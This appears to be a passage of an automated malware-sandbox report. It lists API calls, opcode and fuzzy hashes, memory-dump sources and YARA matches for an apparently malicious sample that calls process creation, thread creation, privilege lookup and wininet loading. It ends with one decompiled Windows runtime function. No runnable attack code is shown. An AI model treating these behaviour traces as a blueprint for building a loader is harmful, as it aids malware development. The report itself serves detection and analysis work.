                                            • Instruction ID: 8cecffe294b58361acf25590d531799798fc1a556d135b3d1436d9b5def7d367
                                            • Opcode Fuzzy Hash: fac78e13f16dc15222128715efb6c2a46df8577744d891ffd1a2a70fbff3eb0d
                                            • Instruction Fuzzy Hash: A5900261382095526545F15954045174496B7E0285791C412A1404951C866698A6E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 07d48f74e6d7d42fb52c6282919f88da57c36d1685d82ae9d62e3ea9f8b15873
                                            • Instruction ID: f52e5c50b71bffb27d165fb64a926beee21a86d47f84dcd0781fb1183fd3457b
                                            • Opcode Fuzzy Hash: 07d48f74e6d7d42fb52c6282919f88da57c36d1685d82ae9d62e3ea9f8b15873
                                            • Instruction Fuzzy Hash: 9D90027134105813E111A15955047170499A7D0285F91C812A0414559D979689A2B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02FE7388
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 845d09c5812c3f1fdf0278c6f89c75663bf61d8411baaf0f172a2671cfd6218f
                                            • Instruction ID: 1e93f5b5ab5f644932d6b7855ce2e824c930ceb5e714435cf253049a91b0b898
                                            • Opcode Fuzzy Hash: 845d09c5812c3f1fdf0278c6f89c75663bf61d8411baaf0f172a2671cfd6218f
                                            • Instruction Fuzzy Hash: FA31AFB6641600ABDB16EF64CCA0FABF7B9EF48740F00851DFA1A9B240D730A505CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02FE7388
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 71f9ca019e26b35e0a2cc8770356f5b7a437718b6c381998a2dc65ba4eb80cbc
                                            • Instruction ID: 1d87cafa9e3c1c7b08aa941ea919d5f921111453c0acaeab3eab770ff4ded762
                                            • Opcode Fuzzy Hash: 71f9ca019e26b35e0a2cc8770356f5b7a437718b6c381998a2dc65ba4eb80cbc
                                            • Instruction Fuzzy Hash: A031A072A41204ABCB11EF64CCA0F6BF7A5EF48740F008159FA1A9B281D770A555CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02FD3B93), ref: 02FE88FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
                                            • Instruction ID: f66f41d39a55d8246579c84421014e1015513d8045bfea027a36e3c869e691a8
                                            • Opcode Fuzzy Hash: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
                                            • Instruction Fuzzy Hash: 7AE092B52102146BDB18DF58CC49EDB7769EF88791F218554FD099B342C631E912CBF2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02FD3B93), ref: 02FE88FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 1469c58290cb3fecd3282f7235121d50343de1dae278f86383501320ac72a712
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 11E046B1200208ABDB18EF99CC48EA777ADEF88750F118558FE095B241C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02FD72DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02FD72FB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: f22d3f0c167aa5cbdf7b4392c342a80d126bf9e03f11585d1b9ec44548293c15
                                            • Instruction ID: 10965696d04f5c9a5ed4fca77b8fca3a51196d77e9b84625c9ced550c72c9519
                                            • Opcode Fuzzy Hash: f22d3f0c167aa5cbdf7b4392c342a80d126bf9e03f11585d1b9ec44548293c15
                                            • Instruction Fuzzy Hash: F201DB31E8022977EB21B6959C42FFEB76E5B40F91F150158FF04BA1C0EAD469054BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02FD9BB2
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction ID: cd69023bc71ccb6acd2bccdbb2870ea17ca75250dc57e5303c2dd9513b686dac
                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction Fuzzy Hash: 320121B5E0020DBBDF10DBE4DC42F9EB779AB54348F0441A5EA0997284F671EB18CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FE8994
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 458c4a9df89f3820f1a2aca68be921416a26436dcee634155ea815ec7985b446
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 1601B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02FDCCF0,?,?), ref: 02FE744C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
                                            • Instruction ID: 7de8b585ff4a29ff104ee056aee489f28bafffe034e8a5e9b631a3376eda306d
                                            • Opcode Fuzzy Hash: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
                                            • Instruction Fuzzy Hash: 0EE06D337803043AE62165999C02FA7B79C9B81B64F140466FB0EEB2C0D595F90146A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02FDCCF0,?,?), ref: 02FE744C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
                                            • Instruction ID: b6b0abd3dafe91ede66f076457ace7ec9695209e4103bd1bd1e1059f62af0d93
                                            • Opcode Fuzzy Hash: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
                                            • Instruction Fuzzy Hash: 54F02B367403003BD7316A58CC02FA3B79DDF84B54F500468FB0AAB2C0DAA1B40087D5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02FDCFC2,02FDCFC2,?,00000000,?,?), ref: 02FE8A60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
                                            • Instruction ID: d6f6fea3849913e2c9bf7ace88d01aa2c2f992774df41e4a8aa667627a231e92
                                            • Opcode Fuzzy Hash: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
                                            • Instruction Fuzzy Hash: 9FF0A0B2200114AFDB24CF14CC88EEB7769EF85310F008198FD085B241DA31A810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02FDCFC2,02FDCFC2,?,00000000,?,?), ref: 02FE8A60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: babf92b216c15565431f8576d29d2a04a48dc144e20a2579a2ce4f3ab227d5af
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 54E01AB12002086BDB14DF49CC84EE737ADAF88650F118554BA0957241C934E8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(02FE3536,?,02FE3CAF,02FE3CAF,?,02FE3536,?,?,?,?,?,00000000,00000000,?), ref: 02FE88BD
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 63652245422871480451e391417c6a923733e7e3e8514c8f72eec5132149b5c6
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 4BE046B1200208ABDB18EF99CC44EA777ADEF88750F118558FE095B241C630F910CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02FD7C83,?), ref: 02FDD45B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                            • Instruction ID: 6213851167a43d8d20ef6a36fdbdd0e8a73637961a89c328b927882f8fbc8d3e
                                            • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                            • Instruction Fuzzy Hash: 6AD05E627503083AEA10BAA49C16F2632895B45B84F4940A4FA49972C3DA50F4008561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1c897ee2db56d347445d201729762b60d9fd1a6a45c5e1373bbb2ba1dc5a14b2
                                            • Instruction ID: 7c1c02c2873d27adbde5512fdd7cca6e0fd5314cdf88f375938932410a993785
                                            • Opcode Fuzzy Hash: 1c897ee2db56d347445d201729762b60d9fd1a6a45c5e1373bbb2ba1dc5a14b2
                                            • Instruction Fuzzy Hash: A9B09B719414D5C5E611D760560872B7D5477D0745F16C551D1020647F4779C0D1F5F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 53%
                                            			E0355FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0350CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E03555720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E03555720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0355FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0355FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0355FE2B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 74f56852e91d18c4f64d3989ed95483d548df3834b353fbcc9616a6a4913952a
                                            • Instruction ID: a0ece6dfe6f54bd8a847791689212d82da777cb4e188b482f622829e9a962725
                                            • Opcode Fuzzy Hash: 74f56852e91d18c4f64d3989ed95483d548df3834b353fbcc9616a6a4913952a
                                            • Instruction Fuzzy Hash: 02F0FC36140201BFD6215A95EC01F67BF7AFB85770F240716FA245E1E1EA62F86086F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%